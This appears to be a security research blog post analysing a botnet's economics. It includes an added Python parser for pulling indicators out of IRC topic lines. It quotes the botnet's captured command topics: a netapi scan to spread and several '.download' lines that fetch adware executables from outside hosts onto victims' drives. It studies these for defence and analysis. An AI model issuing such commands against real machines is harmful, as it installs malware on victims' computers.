On the Economics of Botnets

Running a botnet can be a lucrative way for an attacker to make money. He can, for example, rent his bots to a spammer who then uses the SOCKS proxy on the compromised machines to send out tons of spam. Or he can install a keylogger or tools that read out the Protected Storage in order to retrieve sensitive information from the victims. Or he can install Adware on those machines and earn some money that way.

Adware seems to be rather lucrative: recently we were monitoring several botnets that use the MS06-040 (Vulnerability in Server Service Could Allow Remote Code Execution) vulnerability (PoC). One of those botnets used the following channel structure:
  • # f00 #: .ircraw join # scan #,,# frame ## Do #,# a #
  • # scan #: .scan netapi 100 3 0 -r -b -s
  • # frame #: .download http://XXXsikpgz.com/dl/loadadv518.exe c:\lsas.exe 1 -s
  • # Do #: .download http://promo.dollarrevenue.com/webmasterexe/drsmartloadXXXa.exe c:\do.exe 1 -s
  • # a #: .download http://YYY.19.23.XXX/~from/taskmgr.exe c:\taskmgr.exe 1 -s


The main channel f00 is just used to dispatch all incoming bots. The bots join four different channels:
  1. # scan # is used to propagate further: all bots search for other victims
  2. Adware is installed on all compromised machines with the topic of channel # frame #
  3. Another piece of Adware is installed in channel # Do # - in this case a binary from http://www.dollarrevenue.com/
  4. Finally, the channel # a # installs an additional binary on all bots.
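
Because every instruction in this structure is delivered as a channel topic, topic lines in captured IRC traffic are a convenient place to pull indicators from. The following is an added example, not code from the original post: a small parser that reads topic lines (IRC numeric 332 and TOPIC messages) and extracts download URLs, drop paths and the dispatch channel list. The sample lines, host names and the result field names are constructed for illustration; only the command syntax (.ircraw join, .scan, .download) is taken from the topics listed above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample: topic lines as an IRC client receives them (numeric 332
# on join, TOPIC on change). Hosts and nicks are placeholders, not from the post.
SAMPLE = r"""
:irc.example.invalid 332 bot1 #f00 :.ircraw join #scan,#frame,#Do,#a
:irc.example.invalid 332 bot1 #scan :.scan netapi 100 3 0 -r -b -s
:irc.example.invalid 332 bot1 #frame :.download http://adware.example.invalid/dl/load.exe c:\lsas.exe 1 -s
:irc.example.invalid 332 bot1 #help :Welcome, please read the rules
:op!u@h.example.invalid TOPIC #a :.download http://198.51.100.7/~from/taskmgr.exe c:\taskmgr.exe 1 -s
""".strip().splitlines()

TOPIC_RE = re.compile(r"^:\S+ (?:332 \S+|TOPIC) (?P<chan>\S+) :(?P<topic>.*)$")


def parse_topic(line):
    """Return a finding dict if the topic is a bot command, else None."""
    m = TOPIC_RE.match(line.strip())
    if not m or not m["topic"].startswith("."):
        return None  # not a topic line, or an ordinary human-readable topic
    args = m["topic"].split()
    verb = args[0][1:].lower()
    finding = {"channel": m["chan"], "verb": verb}
    if verb == "download" and len(args) >= 3:
        host = urlsplit(args[1]).hostname or ""
        try:
            ipaddress.ip_address(host)
            raw_ip = True  # binary served from a bare IP address
        except ValueError:
            raw_ip = False
        finding.update(url=args[1], host=host, raw_ip=raw_ip, drop_path=args[2])
    elif verb == "ircraw" and len(args) >= 3 and args[1].lower() == "join":
        # Dispatch topic: lists the channels every new bot is sent to.
        finding["joins"] = [c for c in args[2].split(",") if c]
    elif verb == "scan":
        # Only the first argument is kept; the post does not explain the rest.
        finding["scan_arg"] = args[1] if len(args) > 1 else None
    return finding


def extract_findings(lines):
    return [f for f in map(parse_topic, lines) if f]


if __name__ == "__main__":
    for f in extract_findings(SAMPLE):
        print(f)
```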


Ok, and how much can a botherd earn with this kind of attack? A quick look at the numbers: DollarRevenue pays per install, depending on the country the bot is installed in. Within 24 hours, this botnet compromised a little over 7700 machines. Doing some quick math leads to the following result:
$ grep US 2006-08-28.log | wc -l 
998
$ grep CAN 2006-08-28.log | wc -l
20
$ grep GBR 2006-08-28.log | wc -l
103
$ grep CHN 2006-08-28.log | wc -l
756
$ egrep -v "US|CAN|GBR|CHN" 2006-08-28.log | wc -l
5852

998 x $0.3 + 20 x $0.2 + 103 x $0.1 + 756 x $0.01 + 5852 x $0.02 = $438.30

So he earns more than $430 in a single day just with DollarRevenue, and presumably a similar sum with the other pieces of Adware. Not a bad income for doing almost no work ;-)
